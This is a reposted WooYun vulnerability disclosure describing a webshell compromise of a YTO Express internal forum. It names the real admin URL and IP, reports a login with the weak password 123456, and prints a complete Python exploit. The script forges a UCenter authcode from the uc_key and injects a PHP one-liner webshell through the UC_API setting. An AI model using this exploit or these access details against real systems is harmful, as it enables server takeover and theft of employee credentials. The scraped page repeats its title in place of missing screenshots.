神刀安全网

漏洞标题: 圆通某内部论坛getshell(可泄漏员工密码)

漏洞详情

披露状态:

2016-04-22: 细节已通知厂商并且等待厂商处理中
2016-04-22: 厂商已经确认,细节仅向厂商公开
2016-05-02: 细节向核心白帽子及相关领域专家公开
2016-05-12: 细节向普通白帽子公开
2016-05-22: 细节向实习白帽子公开
2016-06-06: 细节向公众公开

简要描述:

讲道理宝宝不服(。•ˇ‸ˇ•。)
http://wooyun.org/bugs/wooyun-2016-0198952
提权外连都只给5rank
不跟你玩了(╯°□°)╯︵ ┻━┻

详细说明:

code 区域
http://180.153.190.79:8880/uc_server/admin.php?

啦啦 点进去 默认账户

试下弱口令123456

不小心进去了

漏洞标题:  圆通某内部论坛getshell(可泄漏员工密码)

点进应用管理

漏洞标题:  圆通某内部论坛getshell(可泄漏员工密码)

uc_key是用来加密用户传参的

用脚本构造一下

code 区域
#! /usr/bin/env python
# coding=utf-8
import hashlib
import time
import math
import base64
import urllib
import urllib2
import sys


def microtime(get_as_float=False):
if get_as_float:
return time.time()
else:
return '%.8f %d' % math.modf(time.time())


def get_authcode(string, key=''):
ckey_length = 4
key = hashlib.md5(key).hexdigest()
keya = hashlib.md5(key[0:16]).hexdigest()
keyb = hashlib.md5(key[16:32]).hexdigest()
keyc = (hashlib.md5(microtime()).hexdigest())[-ckey_length:]
#keyc = (hashlib.md5('0.736000 1389448306').hexdigest())[-ckey_length:]
cryptkey = keya + hashlib.md5(keya + keyc).hexdigest()

key_length = len(cryptkey)
string = '0000000000' + /
(hashlib.md5(string + keyb)).hexdigest()[0:16] + string
string_length = len(string)
result = ''
box = range(0, 256)
rndkey = dict()
for i in range(0, 256):
rndkey[i] = ord(cryptkey[i % key_length])
j = 0
for i in range(0, 256):
j = (j + box[i] + rndkey[i]) % 256
tmp = box[i]
box[i] = box[j]
box[j] = tmp
a = 0
j = 0
for i in range(0, string_length):
a = (a + 1) % 256
j = (j + box[a]) % 256
tmp = box[a]
box[a] = box[j]
box[j] = tmp
result += chr(ord(string[i]) ^ (box[(box[a] + box[j]) % 256]))
return keyc + base64.b64encode(result).replace('=', '')


def get_shell(url, key, host):
'''
发送命令获取webshell
'''
headers = {'Accept-Language': 'zh-cn',
'Content-Type': 'application/x-www-form-urlencoded',
'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)',
'Referer': url
}
tm = time.time() + 10 * 3600
tm = "time=%d&action=updateapps" % tm
code = urllib.quote(get_authcode(tm, key))
url = url + "?code=" + code
data1 = '''<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<item id="UC_API">http://xxx/');一句话//</item>
</root>'''
try:
req = urllib2.Request(url, data=data1, headers=headers)
ret = urllib2.urlopen(req)
except:
return "访问出错"
data2 = '''<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<item id="UC_API">http://aaa</item>
</root>'''
try:
req = urllib2.Request(url, data=data2, headers=headers)
ret = urllib2.urlopen(req)
except:
return "error"
return "webshell:"

if __name__ == '__main__':
host = '123.123.123.123'
key = 'uckey'
url = host + "/api/uc.php"
print get_shell(url, key, host)

成功getshell

漏洞标题:  圆通某内部论坛getshell(可泄漏员工密码)

漏洞证明:

code 区域
http://180.153.190.79:8880/uc_server/admin.php?

啦啦 点进去 默认账户

试下弱口令123456

不小心进去了

点进应用管理

漏洞标题:  圆通某内部论坛getshell(可泄漏员工密码)

漏洞标题:  圆通某内部论坛getshell(可泄漏员工密码)

uc_key是用来加密用户传参的

用脚本构造一下

成功getshell

漏洞标题:  圆通某内部论坛getshell(可泄漏员工密码)

修复方案:

随便你吧口亨(╯°□°)╯︵ ┻━┻

版权声明:转载请注明来源 A1opex@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 圆通某内部论坛getshell(可泄漏员工密码)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址